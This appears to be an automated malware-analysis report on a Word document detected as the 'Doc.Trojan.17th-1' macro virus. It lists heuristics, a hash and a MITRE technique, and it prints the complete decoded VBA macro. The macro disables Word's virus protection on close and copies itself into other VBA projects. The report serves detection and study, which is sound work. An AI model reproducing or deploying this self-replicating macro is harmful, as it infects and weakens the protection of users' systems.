MALICIOUS (Risk Score: 80)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
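The sample is an Office document containing VBA macros. When the document is closed, the macro code disables Word's virus protection and suppresses save prompts, alerts and screen updates. It then goes through the loaded VBA projects: each one that is not protected and whose description is not already '17th' has its description set to '17th' and the code of its first component replaced with the macro's own 17 lines. This suggests an attempt to evade analysis or hide malicious functionality. The ClamAV detection 'Doc.Trojan.17th-1' further supports the malicious nature.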
Heuristics (2)
- ClamAV: Doc.Trojan.17th-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.17th-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 833 bytes |

SHA-256: dfd0bd010f89456120c513576625645965aaf414bc342362a0075d38262bc45e

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - 17th
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Application.ScreenUpdating = 0
Application.EnableCancelKey = 0
Set Ј\ = VBE.VBProjects
For Јd = 1 To Ј \ .Count
If Ј\(Јd).Protection <> 1 And Ј\(Јd).Description <> "17th" Then
Ј\(Јd).Description = "17th"
Set Јo = Ј\(Јd).VBComponents(1).CodeModule
Јo.DeleteLines 1, Јo.CountOfLines
Јo.AddFromString VBProject.VBComponents(1).CodeModule.Lines(1, 17)
End If: Next
End Sub
```